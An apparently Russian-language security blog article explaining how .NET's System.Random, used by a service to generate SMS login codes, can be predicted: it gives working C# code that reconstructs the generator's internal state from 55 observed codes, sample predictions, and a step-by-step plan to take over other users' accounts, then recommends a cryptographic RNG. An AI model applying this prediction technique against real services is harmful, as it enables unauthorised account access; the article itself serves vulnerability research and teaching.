Неслучайная случайность, или Атака на ГПСЧ в .NET +70


Random numbers should not be generated with a method chosen at random.
— Donald Knuth

Копаясь как-то в исходниках одного сервиса в поисках уязвимостей, я наткнулся на генерацию одноразового кода для аутентификации через SMS. Обработчик запросов на отправку кода упрощённо выглядел так:


class AuthenticateByPhoneHandler
{
    /* ... */

    static string GenerateCode() => rnd.Next(100000, 1000000).ToString();

    readonly static Random rnd = new Random();
}

Проблема видна невооруженным глазом: для генерации 6-тизначного кода используется класс Random — простой некриптографический генератор псевдослучайных чисел (ГПСЧ). Займёмся им вплотную: научимся предсказывать последовательность случайных чисел и прикинем возможный сценарий атаки на сервис.


Потокобезопасность


Кстати, заметим, что в приведённом фрагменте кода доступ к статическому экземпляру rnd класса Random из нескольких потоков не синхронизирован. Это может привести к неприятному казусу, который можно часто встретить в вопросах и ответах на StackOverflow:



То есть первый сценарий атаки прост — шлём на сервер множество параллельных запросов на отправку SMS, в результате экземпляр класса Random оказывается в весьма плачевном состоянии.


Однако, эта атака слишком грубая. Кроме того, нарушать работоспособность сервиса в планы не входило. Поэтому перейдём к предсказанию кодов, отправляемых в SMS.


Потрошим Random.cs


В документации написано, что класс Random реализует алгоритм генерации случайных чисел методом вычитания, предложенный Дональдом Кнутом во втором томе «Искусства программирования», это вариация запаздывающего генератора Фибоначчи.


Забавно, что алгоритм реализован с опечаткой. Генератор инициализируется значениями, которые отличаются от описанных Кнутом, поэтому свойства и период генерируемых чисел могут быть хуже ожидаемых. Microsoft решила не исправлять реализацию, чтобы не ломать обратную совместимость. Вместо этого в документации появилась оговорка про «модифицированную» версию алгоритма.

Так выглядит метод для генерации следующего псевдослучайного числа.


private int InternalSample()
{
    int locINext = inext;
    int locINextp = inextp;

    if(++locINext >= 56) locINext = 1;
    if(++locINextp >= 56) locINextp = 1;

    var retVal = SeedArray[locINext] - SeedArray[locINextp];

    if(retVal == int.MaxValue) retVal--;
    if(retVal < 0) retVal += int.MaxValue;

    SeedArray[locINext] = retVal;

    inext = locINext;
    inextp = locINextp;

    return retVal;
}

private int inext = 0;
private int inextp = 21;

private readonly int[] SeedArray = new int[56];

У генератора есть внутреннее состояние SeedArray из 56 int-ов (нулевой элемент не используется, поэтому на самом деле их 55). Новое псевдослучайное число получается путем вычитания двух чисел, расположенных во внутреннем состоянии c индексами inext и inextp. Это же число заменяет элемент внутреннего состояния с индексом inext.



Это означает, что для предсказания следующего псевдослучайного числа не нужно знать теорию аддитивных случайных генераторов, а достаточно лишь узнать текущее внутреннее состояние генератора. И это можно сделать на основе его выходных значений.


Предсказываем будущее


В качестве предсказателя будем использовать экземпляр того же класса Random, в котором через рефлексию заменим внутреннее состояние SeedArray. Для заполнения внутреннего состояния потребуется функция, обратная к преобразованию произвольного Int32-числа из внутреннего состояния к диапазону [min;max):


public static int GetInternalStateValue(int minValue, int maxValue, int value)
{
    var range = maxValue - minValue; // Не учитываем случай range > int.MaxValue
    return (int) ((double) (value - minValue) / range * int.MaxValue);
}

В этом методе используются операции с вещественными числами, поэтому мы получим лишь приближённое значение внутреннего состояния. Напишем тест, чтобы узнать, насколько велика погрешность на нашем диапазоне [100000; 1000000):


var rnd = new Random(31337);

var seedArray = new[] {0}.Concat( // Нулевой элемент SeedArray не используется
        Enumerable.Range(0, 55)
            .Select(i => rnd.Next(Min, Max))
            .Select(val => GetInternalStateValue(Min, Max, val)))
        .ToArray();

var predictor = new Random();

typeof(Random)
    .GetField("SeedArray", BindingFlags.Instance | BindingFlags.NonPublic)
    .SetValue(predictor, seedArray); // Инициализируем предсказатель

for(int i = 0; i < 10; i++)
    Console.WriteLine($"{rnd.Next(Min, Max)} vs {predictor.Next(Min, Max)}");

Получим:


103753 vs 103754 // (+1)
617169 vs 617169
523211 vs 523211
382862 vs 382862
516139 vs 516140 // (+1)
555187 vs 555187
384855 vs 384856 // (+1)
543554 vs 543553 // (-1)
327867 vs 327867
745153 vs 745153

Вуаля! Теперь можно, зная последовательность из 55 чисел, почти точно предсказывать следующие псевдослучайные числа из нужного диапазона.


После предсказания (55 – 21 = 34) чисел ошибка нарастает, и лучше заново инициализировать предсказатель.

Сценарий атаки


Для осуществления атаки нужно учесть ещё один нюанс. У уязвимого сервиса было несколько реплик, запросы на которые балансировались случайным образом. Можно было бы проверить еще и случайность балансировки, но этого не потребовалось — ответ сервера содержал HTTP-заголовок с именем реплики сервиса.


Кроме того, в сервисе было ограничение — не более 3 SMS на один номер. Однако это легко обойти через любой бесплатный сервис для приёма SMS, который предоставляет пул телефонных номеров.


Теперь вся мозаика в сборе. Сценарий атаки будет такой:


  1. Выбираем время, когда поток запросов на сервис минимален, чтобы избежать генерации псевдослучайных чисел другими пользователями.
  2. Используя номера телефонов из пула, получаем N ? 55 SMS с кодами для входа, где N — число реплик сервиса.
  3. Используя метод GetInternalStateValue для обратного преобразования чисел из диапазона, заполняем внутренние состояния N экземпляров генератора случайных чисел.
  4. Отправляем SMS на интересующий телефонный номер, предсказываем отправленный код, входим в сервис под чужой учетной записью.
  5. Если код не подходит (предполагаем, что из-за погрешности при работе с вещественными числами), пробуем (+1) и (-1).
  6. Берем следующий интересующий телефон...

Вывод


Предсказание будущего для экземпляра Random — дело нехитрое.


Предсказание прошлого тоже не проблема. Для этого нужно точно так же инициализировать внутреннее состояние генератора, а затем «обратить» метод InternalSample и отмотать назад 55 уже известных значений.

При использовании Random нужно не забывать о синхронизации доступа либо использовать ThreadStatic-экземпляры. При создании нескольких экземпляров, необходимо позаботиться о seed, чтобы не получить множество одинаково инициализированных объектов.


В критичных для безопасности местах нужно использовать криптографически стойкий и потокобезопасный RNGCryptoServiceProvider и не раскрывать лишнюю информацию об окружении.


Ссылки по теме





К сожалению, не доступен сервер mySQL